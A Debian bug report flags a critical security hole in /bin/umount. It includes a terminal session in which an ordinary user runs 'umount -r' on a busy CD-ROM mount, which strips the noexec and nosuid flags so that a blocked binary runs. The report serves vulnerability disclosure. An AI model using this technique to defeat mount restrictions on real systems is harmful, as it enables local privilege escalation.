Package: mount Version: 2.11n-7 Severity: critical File: /bin/umount Tags: security Justification: root security hole
Please see http://www.securityfocus.com/archive/1/410333 for details. Verified (that noexec flag is gone) as follows: psz:~$ id uid=1001(psz) gid=1001(amstaff) groups=1001(amstaff),24(cdrom),25(floppy) psz:~$ grep cdrom /etc/fstab /dev/cdrom /cdrom iso9660 ro,user,noauto 0 0 psz:~$ /bin/mount /cdrom psz:~$ /bin/mount | grep cdrom /dev/cdrom on /cdrom type iso9660 (ro,noexec,nosuid,nodev,user=psz) psz:~$ /cdrom/ML3/ML_30_013_Linuxi.bin bash: /cdrom/ML3/ML_30_013_Linuxi.bin: /bin/sh: bad interpreter: Permission denied psz:~$ cd /cdrom psz:/cdrom$ /bin/umount -r /cdrom umount: /dev/cdrom busy - remounted read-only psz:/cdrom$ cd psz:~$ /bin/mount | grep cdrom /dev/cdrom on /cdrom type iso9660 (ro) psz:~$ /cdrom/ML3/ML_30_013_Linuxi.bin Unpacking to /tmp/ML.tar... [ctrl-C] psz:~$ /bin/umount -r /cdrom psz:~$ -- System Information Debian Release: 3.0 Architecture: i386 Kernel: Linux pisa.maths.usyd.edu.au 2.4.27-smssvr1.6 #1 SMP Wed Aug 24 12:16:31 EST 2005 i686 Locale: LANG=C, LC_CTYPE=C Versions of packages mount depends on: ii libc6 2.2.5-11.8 GNU C Library: Shared libraries an -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
